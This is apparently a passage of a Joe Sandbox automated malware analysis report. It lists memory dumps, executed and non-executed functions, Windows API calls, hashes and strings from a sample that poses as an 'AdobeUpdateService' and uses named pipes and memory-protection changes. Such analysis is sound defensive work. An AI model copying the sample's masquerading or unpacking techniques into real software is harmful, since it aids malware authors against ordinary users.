                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction ID: bd9ddbb0fe4a3e6c369a6c316b03fe687d8d5a0e13e3211eb2381caa863402dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF19B72A00218AFCF00DF98D880AAEBBF5FF48310F54456AF945A7352D735AD45CBA9
                                                                                                                                                                                                                                                                    Function 0046A7CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 00402175
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: GetLastError.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 0040217F
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040120A), ref: 0046A7FE
                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040120A), ref: 0046A80D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046A808
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                    • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                                    • Opcode ID: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction ID: 855bd9d759665368c18885314bfe8a93a87ca15081f3247de167772f86f515d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24E06D742007118BD3B0AF65E408B46BAE4AB15704F00887FE481E3681EBB8E8448FAA

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 027192CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02719314
                                                                                                                                                                                                                                                                      • Part of subcall function 02719098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027190C1
                                                                                                                                                                                                                                                                      • Part of subcall function 02719098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0271926D
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02719366
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 027193C0
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 027193F3
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                    • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                                    • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                    • Instruction ID: 14360ff7d2d6f0800cd8e5263ca5f9c56b45407e6c9f98f64014de302f8ee2b6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251FAB5900609EFDB11DFA9C885A9EBBF4FF08344F10851AEA59A7240D370E951CFA4
                                                                                                                                                                                                                                                                    Function 02710BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8643b7cb378e3b704611790b4db6617fbe1f52a074970517699d2cbc06b19a36
                                                                                                                                                                                                                                                                    • Instruction ID: 2fd9e63c58a186d34c142f9fda401149292cd1fa024f6228c6acb09c00afd48f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8643b7cb378e3b704611790b4db6617fbe1f52a074970517699d2cbc06b19a36
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B51C972600606AFEF225F6ACC88EBB77AEEF45718B154169FD44D6150EB31EC90CB60
                                                                                                                                                                                                                                                                    Function 02719098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027190C1
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0271926D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction ID: fd5c7f173d7ff98236ef34e570de3dcee1f7d7cb5b43113d8a8172f72fa9db4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC718871E0424ADFDB45CF98C891BEEBBF0AF09314F184095E565FB241C238AA92DF64
                                                                                                                                                                                                                                                                    Function 02711748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,027112D6,00000001,00000364,00000000,?,000000FF,?,027144E3,?,?,00000000), ref: 02711789
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: aea035a4320bfc883e516aeab754e2ccd9cc44f80c7455bfb0e041511875696f
                                                                                                                                                                                                                                                                    • Instruction ID: e6a7820a3f65e0be050a68eb808dd62856317c48a1d1772a4ce394be2c52ac86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aea035a4320bfc883e516aeab754e2ccd9cc44f80c7455bfb0e041511875696f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF0E03160023656DB321A3E5C49B7737599F41774B588012DE0C9E280EB30D40085E0
                                                                                                                                                                                                                                                                    Function 02713D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,02710C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 02713D75
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                    • Opcode ID: a1ac28e44215abc5f7dedfd8d6d7e03581c7f5aaacd764c783c92eeda93b8264
                                                                                                                                                                                                                                                                    • Instruction ID: 2867209df99a998f0360b7d06d1e553136fd7fbfc1a017552cc404d1058d22e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ac28e44215abc5f7dedfd8d6d7e03581c7f5aaacd764c783c92eeda93b8264
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECF0643640025ABBCF226E96DC089DE3F26EF483A0F198150FA1825020CB32C831AB90
                                                                                                                                                                                                                                                                    Function 0270BEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,?), ref: 0270BFCE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                    • Opcode ID: df575e9b6c3d3f039e9f4be5740f6b08e00c8b368284e0f4954a4e7a853196e0
                                                                                                                                                                                                                                                                    • Instruction ID: 510f1b3c2a39e4086ba6fc93bce1ac745db4b6cb985a7c099135cf8c3f52832e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df575e9b6c3d3f039e9f4be5740f6b08e00c8b368284e0f4954a4e7a853196e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B311A71D00219EFDB10CFA9D880BAEFBF5FB09708F109429E555A7280D771AA09CF54
                                                                                                                                                                                                                                                                    Function 0270BC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0270BCC7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                    • Opcode ID: 76222675b61c8d803e36e6d0cea0e8896417380f2a3b3ee34fe2aefe609ac7de
                                                                                                                                                                                                                                                                    • Instruction ID: 2d9f049ab5244641aee3c0797c4686ed594263ee6b9e6c8981e65715ad8d39db
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76222675b61c8d803e36e6d0cea0e8896417380f2a3b3ee34fe2aefe609ac7de
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE065B5942612FBA3312A209D44D7F77ADEF517057059815FD15E2240DF30D91AC5B1

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 004029A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$AdobeUpdateService: Process certificate didnt match to Adobe certificate!$main: Finished$main: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-108484121
                                                                                                                                                                                                                                                                    • Opcode ID: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction ID: aa4f7462551908f85693e87270aad57e37dee6bb7c79447cbb64f1a26d33a99d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D491F870A002189FEB14DF65CD5ABAE7BB4EB04718F14417EE405B73C1EBB86A05CB99
                                                                                                                                                                                                                                                                    Function 02719277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                    • Instruction ID: 305417b5de2736896cc07d351843b40d940d0da662f8aad022466509d37620fa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF06D79A00200CF8B28DF0EC558D96B7F6EF85724B6545A5E505AB221D3B0EE46CBA1
                                                                                                                                                                                                                                                                    Function 0041F500 Relevance: 30.4, APIs: 11, Strings: 9, Instructions: 396sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BB40E64E,?,00000008), ref: 0041F537
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0041F53F
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F585
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F5C9
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0041F646
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterSleep
                                                                                                                                                                                                                                                                    • String ID: CommBridge$Data size %i is larger than max buffer size, aborting write.$OOBEUtils$Out pipe handle is invalid, aborting write.$Pipe %p not initialized, aborting write.$Terminate channel$Writing data packet to pipe failed with error code %i$Writing info packet to pipe failed with error code %i$`J
                                                                                                                                                                                                                                                                    • API String ID: 4275215032-318403239
                                                                                                                                                                                                                                                                    • Opcode ID: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction ID: 357453fb2a3021c3316a4f80364e3140d53479557ee8387c2b372fbbb1bee486
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8abe9bf9aa2a41506b6c831e74ff08ca7d922cea81cd4335f7d1f82bf08bb469
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E10770B40208ABDB00DF65DD4ABDE7BB5AF45700F24013AF806A72D1DB7CAA458B5D
                                                                                                                                                                                                                                                                    Function 004056B0 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 296sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000028), ref: 0040587F
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • CreateIPCChannel failed for pipe %s, xrefs: 004058D0
                                                                                                                                                                                                                                                                    • failed to create a new thread for ipc communications. Fatal Error, xrefs: 0040591A
                                                                                                                                                                                                                                                                    • Sent communnication ID packet to the client, xrefs: 004056EF
                                                                                                                                                                                                                                                                    • Initializing Communication Channel with ACC with pipename: %s, xrefs: 00405862
                                                                                                                                                                                                                                                                    • Failed to sent communnication ID packet to the client, xrefs: 004059B9
                                                                                                                                                                                                                                                                    • Problem initializing Communication Channel. Quitting. Error code %d, xrefs: 004058A7
                                                                                                                                                                                                                                                                    • Successfully created the client thread, xrefs: 004059E8
                                                                                                                                                                                                                                                                    • thread failed to resumed. fatal error, xrefs: 0040594C
                                                                                                                                                                                                                                                                    • Failed in initial handshake with the client, xrefs: 004058F0
                                                                                                                                                                                                                                                                    • Failed in creating client thread, xrefs: 00405984
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
